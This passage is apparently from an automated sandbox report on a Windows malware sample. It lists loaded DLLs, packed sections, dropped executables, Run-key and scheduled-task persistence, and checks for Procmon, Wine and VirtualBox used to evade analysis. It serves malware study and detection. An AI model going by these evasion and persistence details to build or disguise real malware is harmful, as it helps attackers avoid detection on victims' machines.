                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: winhttp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: webio.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: winnsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: dnsapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: rasadhlp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: fwpuclnt.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: schannel.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: mskeyprotect.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ntasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ncrypt.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ncryptsslp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: msasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: gpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: dpapi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: 8ObkdHP9Hq.exeStatic file information: File size 1889792 > 1048576
                                Source: 8ObkdHP9Hq.exeStatic PE information: Raw size of hicznzml is bigger than: 0x100000 < 0x19bc00

                                Data Obfuscation

                                barindex
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeUnpacked PE file: 0.2.8ObkdHP9Hq.exe.880000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hicznzml:EW;rbflpxvq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hicznzml:EW;rbflpxvq:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 1.2.skotes.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hicznzml:EW;rbflpxvq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hicznzml:EW;rbflpxvq:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 5.2.skotes.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hicznzml:EW;rbflpxvq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hicznzml:EW;rbflpxvq:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeUnpacked PE file: 21.2.9d7da53f74.exe.f50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;kawjnymv:EW;ldklrfiv:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;kawjnymv:EW;ldklrfiv:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeUnpacked PE file: 60.2.9d7da53f74.exe.f50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;kawjnymv:EW;ldklrfiv:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;kawjnymv:EW;ldklrfiv:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_00B242DE
                                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                                Source: num[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0x52a2a
                                Source: num.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x52a2a
                                Source: skotes.exe.0.drStatic PE information: real checksum: 0x1d74aa should be: 0x1d005d
                                Source: random[1].exe0.5.drStatic PE information: real checksum: 0x1c1519 should be: 0x1c3efd
                                Source: 8ObkdHP9Hq.exeStatic PE information: real checksum: 0x1d74aa should be: 0x1d005d
                                Source: 9d7da53f74.exe.5.drStatic PE information: real checksum: 0x1c1519 should be: 0x1c3efd
                                Source: 8ObkdHP9Hq.exeStatic PE information: section name:
                                Source: 8ObkdHP9Hq.exeStatic PE information: section name: .idata
                                Source: 8ObkdHP9Hq.exeStatic PE information: section name:
                                Source: 8ObkdHP9Hq.exeStatic PE information: section name: hicznzml
                                Source: 8ObkdHP9Hq.exeStatic PE information: section name: rbflpxvq
                                Source: 8ObkdHP9Hq.exeStatic PE information: section name: .taggant
                                Source: skotes.exe.0.drStatic PE information: section name:
                                Source: skotes.exe.0.drStatic PE information: section name: .idata
                                Source: skotes.exe.0.drStatic PE information: section name:
                                Source: skotes.exe.0.drStatic PE information: section name: hicznzml
                                Source: skotes.exe.0.drStatic PE information: section name: rbflpxvq
                                Source: skotes.exe.0.drStatic PE information: section name: .taggant
                                Source: random[1].exe0.5.drStatic PE information: section name:
                                Source: random[1].exe0.5.drStatic PE information: section name: .rsrc
                                Source: random[1].exe0.5.drStatic PE information: section name: .idata
                                Source: random[1].exe0.5.drStatic PE information: section name:
                                Source: random[1].exe0.5.drStatic PE information: section name: kawjnymv
                                Source: random[1].exe0.5.drStatic PE information: section name: ldklrfiv
                                Source: random[1].exe0.5.drStatic PE information: section name: .taggant
                                Source: 9d7da53f74.exe.5.drStatic PE information: section name:
                                Source: 9d7da53f74.exe.5.drStatic PE information: section name: .rsrc
                                Source: 9d7da53f74.exe.5.drStatic PE information: section name: .idata
                                Source: 9d7da53f74.exe.5.drStatic PE information: section name:
                                Source: 9d7da53f74.exe.5.drStatic PE information: section name: kawjnymv
                                Source: 9d7da53f74.exe.5.drStatic PE information: section name: ldklrfiv
                                Source: 9d7da53f74.exe.5.drStatic PE information: section name: .taggant
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00DBD91C push ecx; ret 5_2_00DBD92F
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B40A76 push ecx; ret 6_2_00B40A89
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B9B035 push ecx; ret 20_2_00B9B048
                                Source: 8ObkdHP9Hq.exeStatic PE information: section name: entropy: 7.985482798218243
                                Source: 8ObkdHP9Hq.exeStatic PE information: section name: hicznzml entropy: 7.954513135451816
                                Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.985482798218243
                                Source: skotes.exe.0.drStatic PE information: section name: hicznzml entropy: 7.954513135451816
                                Source: random[1].exe0.5.drStatic PE information: section name: entropy: 7.974967457011881
                                Source: random[1].exe0.5.drStatic PE information: section name: kawjnymv entropy: 7.953272696615757
                                Source: 9d7da53f74.exe.5.drStatic PE information: section name: entropy: 7.974967457011881
                                Source: 9d7da53f74.exe.5.drStatic PE information: section name: kawjnymv entropy: 7.953272696615757
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\num[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeJump to dropped file
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1000336001\num.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file

                                Boot Survival

                                barindex
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 84d280a9e8.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9d7da53f74.exeJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeWindow searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 84d280a9e8.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 84d280a9e8.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9d7da53f74.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9d7da53f74.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B3F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_00B3F98E
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00BB1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_00BB1C41
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B99C10 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,20_2_00B99C10
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_6-97081
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
